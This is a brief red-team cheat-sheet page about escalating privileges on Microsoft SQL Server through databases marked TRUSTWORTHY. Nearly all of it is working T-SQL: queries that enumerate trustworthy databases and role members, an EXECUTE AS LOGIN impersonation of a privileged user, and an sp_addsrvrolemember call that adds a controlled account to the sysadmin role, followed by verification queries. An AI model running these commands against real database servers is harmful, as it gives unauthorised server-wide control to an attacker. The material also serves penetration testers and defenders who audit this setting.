Operator On The Wire· OOTW · 2026 ·

← Back to Knowledge Base

RED TEAM / SQL / MSSQL / PRIVILEGE ESCALATION

Trustworthy Databases

Enumerate

SELECT a.name AS 'database', b.name AS 'owner', is_trustworthy_on FROM sys.databases a JOIN sys.server_principals b ON a.owner_sid = b.sid;

Identify User

(looking for privileged users we can impersonate)

USE DBNAME; SELECT b.name, c.name FROM DBNAME.sys.database_role_members a JOIN DBNAME.sys.database_principals b ON a.role_principal_id = b.principal_id LEFT JOIN DBNAME.sys.database_principals c ON a.member_principal_id = c.principal_id;

Exploit

USE DB_GOES_HERE;
EXECUTE AS LOGIN = 'TARGET_USER';

SELECT IS_ROLEMEMBER('db_owner'); -- verify

EXEC sp_addsrvrolemember 'CONTROLLED_USER', 'sysadmin' -- privesc

Verify

REVERT;
SELECT SYSTEM_USER;
SELECT IS_SRVROLEMEMBER('sysadmin');